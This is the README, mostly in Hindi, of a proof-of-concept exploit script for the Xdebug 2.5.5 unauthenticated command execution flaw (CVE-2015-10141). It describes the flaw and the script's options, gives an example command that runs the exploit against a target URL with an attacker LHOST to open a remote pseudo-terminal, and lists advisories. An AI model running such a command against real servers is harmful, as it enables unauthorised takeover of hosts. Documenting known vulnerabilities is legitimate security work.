
POC exploit for CVE-2015-10141
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141
Xdebug संस्करण 2.5.5 और इससे पहले के संस्करणों में, जो एक PHP डिबगिंग एक्सटेंशन है, एक अप्रमाणित OS कमांड इंजेक्शन भेद्यता मौजूद है। जब रिमोट डिबगिंग सक्षम होती है, तो Xdebug पोर्ट 9000 पर सुनता है और बिना प्रमाणीकरण के डिबगर प्रोटोकॉल कमांड स्वीकार करता है। एक हमलावर इस इंटरफ़ेस पर एक क्राफ्टेड eval कमांड भेजकर मनमाना PHP कोड निष्पादित कर सकता है, जो system() या passthru() जैसे सिस्टम-स्तरीय फ़ंक्शन को आह्वान कर सकता है। इसके परिणामस्वरूप वेब सर्वर उपयोगकर्ता के विशेषाधिकारों के तहत होस्ट का पूर्ण समझौता होता है।
usage: CVE-2015-10141.py [-h] -u URL -l LHOST
CVE-2015-10141 - xdebug v2.5.5 RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL URL of the target
-l, --lhost LHOST LHOST to trigger the RCE
बस एक्सप्लॉइट को निष्पादित करें और एक PHP फ़ाइल जैसे index.php और लोकल होस्ट के साथ एक मान्य URL प्रदान करें। फिर एक्सप्लॉइट एक छद्म-टर्मिनल स्थापित करने का प्रयास करेगा जो आपको दूरस्थ रूप से कमांड निष्पादित करने की अनुमति देता है
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3
ध्यान रखें कि कुछ मामलों में आउटपुट बिल्कुल भी प्रतिबिंबित नहीं होगा और आपको केवल निष्पादित कमांड की पहली पंक्ति दिखाई देगी, यह स्क्रिप्ट की कोई समस्या नहीं है, भेद्यता इसी प्रकार काम करती है)
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है
कॉपीराइट © 2025, D3Ext